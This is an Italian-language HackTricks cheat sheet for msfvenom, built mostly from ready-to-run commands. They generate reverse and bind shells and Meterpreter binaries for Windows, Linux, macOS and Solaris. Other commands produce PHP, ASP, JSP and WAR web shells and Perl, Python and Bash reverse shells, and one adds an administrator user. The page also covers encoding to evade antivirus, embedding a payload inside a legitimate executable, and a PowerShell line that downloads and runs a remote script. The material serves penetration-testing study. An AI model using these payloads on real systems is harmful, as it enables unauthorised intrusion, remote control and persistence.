# MSFVenom - CheatSheet
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)! Altri modi per supportare HackTricks: * Se vuoi vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PIANI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)! * Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com) * Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT esclusivi**](https://opensea.io/collection/the-peass-family) * **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo Telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Condividi i tuoi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Unisciti al server [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) per comunicare con hacker esperti e cacciatori di bug bounty! **Insight sull'Hacking**\ Interagisci con contenuti che approfondiscono l'emozione e le sfide dell'hacking **Notizie sull'Hacking in Tempo Reale**\ Resta aggiornato sul mondo dell'hacking frenetico attraverso notizie e approfondimenti in tempo reale **Ultime Novità**\ Rimani informato sul lancio delle nuove bug bounty e sugli aggiornamenti cruciali delle piattaforme **Unisciti a noi su** [**Discord**](https://discord.com/invite/N3FrSbmwdy) e inizia a collaborare con i migliori hacker oggi stesso! *** ## Basic msfvenom `msfvenom -p -e -f -i LHOST=` È anche possibile utilizzare `-a` per specificare l'architettura o `--platform` ## Elenco ```bash msfvenom -l payloads #Payloads msfvenom -l encoders #Encoders ``` ## Parametri comuni durante la creazione di uno shellcode When creating a shellcode using `msfvenom`, there are several common parameters that can be used to customize the shellcode according to specific requirements. These parameters include: - **`-p`**: Specifies the payload to be used in the shellcode. This can be a variety of payloads such as reverse shells, bind shells, or other types of exploits. - **`LHOST`**: Specifies the IP address of the listener or the remote host to which the shellcode will connect. - **`LPORT`**: Specifies the port number on which the listener is running or the remote port to which the shellcode will connect. - **`-f`**: Specifies the output format of the shellcode. This can be different formats such as raw, exe, elf, or others. - **`-e`**: Specifies the encoder to be used to obfuscate the shellcode. Encoders can help bypass certain security mechanisms such as antivirus software. - **`-b`**: Specifies a list of characters to avoid when generating the shellcode. This can be useful to avoid bad characters that may cause issues when executing the shellcode. - **`-i`**: Specifies the number of iterations for the encoder. Increasing the number of iterations can increase the complexity of the obfuscation. - **`-a`**: Specifies the architecture for the shellcode. This can be x86, x64, or other architectures depending on the target system. - **`-n`**: Specifies the number of nops (no-operation instructions) to be added before the shellcode. Nops can be used to provide padding and help with alignment. These parameters can be combined and customized to create shellcode that suits the specific needs of a penetration test or exploit. ```bash -b "\x00\x0a\x0d" -f c -e x86/shikata_ga_nai -i 5 EXITFUNC=thread PrependSetuid=True #Use this to create a shellcode that will execute something with SUID ``` ## **Windows** ### **Shell Inversa** {% code overflow="wrap" %} ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe ``` ### Shell di Bind {% code overflow="wrap" %} ```bash msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe ``` {% code overflow="wrap" %} ### Creare un utente {% code %} ```bash msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe ``` ### Shell CMD {% code overflow="wrap" %} ```bash msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe ``` {% code overflow="wrap" %} ### **Esegui Comando** {% code %} ```bash msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe ``` ### Codificatore {% code overflow="wrap" %} ```bash msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe ``` ### Incorporato all'interno di un eseguibile {% code overflow="wrap" %} ```bash msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe ``` {% endcode %} ## Payload Linux ### Shell Inversa {% code overflow="wrap" %} ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf ``` ### Shell di Bind {% code overflow="wrap" %} ```bash msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf ``` {% endcode %} ### SunOS (Solaris) {% code overflow="wrap" %} ```bash msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf ``` {% endcode %} ## **Payload MAC** ### **Shell Inversa:** {% code overflow="wrap" %} ```bash msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho ``` ### **Shell di Bind** {% code overflow="wrap" %} ```bash msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho ``` {% endcode %} ## **Payload basati su Web** ### **PHP** #### Reverse shel**l** {% code overflow="wrap" %} ```bash msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php ``` {% endcode %} ### ASP/x #### Shell inversa {% code overflow="wrap" %} ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx ``` {% endcode %} ### JSP #### Shell inversa {% code overflow="wrap" %} ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp ``` {% endcode %} ### WAR #### Shell Inversa {% code overflow="wrap" %} ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war ``` {% code %} ### NodeJS ```bash msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) ``` ## **Payload di linguaggio di script** ### **Perl** {% code overflow="wrap" %} ```bash msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl ``` ### **Python** {% code overflow="wrap" %} ```bash msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py ``` ### **Bash** {% code overflow="wrap" %} ```bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh ``` {% endcode %}
Unisciti al server [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) per comunicare con hacker esperti e cacciatori di bug! **Approfondimenti sull'hacking**\ Interagisci con contenuti che approfondiscono l'emozione e le sfide dell'hacking **Notizie sull'hacking in tempo reale**\ Resta aggiornato sul mondo dell'hacking frenetico attraverso notizie e approfondimenti in tempo reale **Ultime notizie**\ Rimani informato sul lancio dei bug bounty più recenti e sugli aggiornamenti cruciali della piattaforma **Unisciti a noi su** [**Discord**](https://discord.com/invite/N3FrSbmwdy) e inizia a collaborare con i migliori hacker oggi stesso!
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)! Altri modi per supportare HackTricks: * Se vuoi vedere la tua **azienda pubblicizzata su HackTricks** o **scaricare HackTricks in PDF** Controlla i [**PACCHETTI DI ABBONAMENTO**](https://github.com/sponsors/carlospolop)! * Ottieni il [**merchandising ufficiale di PEASS & HackTricks**](https://peass.creator-spring.com) * Scopri [**The PEASS Family**](https://opensea.io/collection/the-peass-family), la nostra collezione di [**NFT**](https://opensea.io/collection/the-peass-family) esclusivi * **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo Telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Condividi i tuoi trucchi di hacking inviando PR ai repository github di** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).